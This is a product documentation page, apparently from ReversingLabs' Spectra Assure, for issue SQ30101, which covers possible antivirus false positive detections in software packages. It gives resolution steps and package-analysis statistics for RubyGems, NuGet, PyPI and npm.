SQ30101
Detected possible false positive detections by third-party scanners.
| priority | CI/CD status | severity | effort | SAFE level | SAFE assessment |
|---|---|---|---|---|---|
| None | pass | low | medium | None | malware: warning Reason: antivirus false positives detected |
About the issueโ
False positive detections may cause users to hesitate from deploying a software package. One or more third-party software security solutions have flagged parts of the package as malicious. While these are individual malicious code detection reports, there is no industry-wide consensus that confirms these suspicions. This may happen when a third-party scanner is running the advanced detection heuristics with a higher false positive rate. However, there is a small chance this detection is true positive, and an early indication of a software supply chain attack.
How to resolve the issueโ
- Investigate reported detections.
- If the software intent does not relate to malicious behavior, investigate your build and release environment for software supply chain compromise.
- You should delay the software release until the investigation is completed.
- Report confirmed false positive detections to security solution providers.
Incidence statisticsโ
ReversingLabs periodically collects and analyzes the contents of popular software package repositories for threat research purposes. Analysis results are used to calculate incidence statistics for issues (policy violations) that Spectra Assure can detect in software packages.
This section is updated when new data becomes available.
Total amount of packages analyzed
- RubyGems: 183K
- Nuget: 644K
- PyPi: 628K
- NPM: 3.72M
Recommended readingโ
- False positive (External resource - NIST)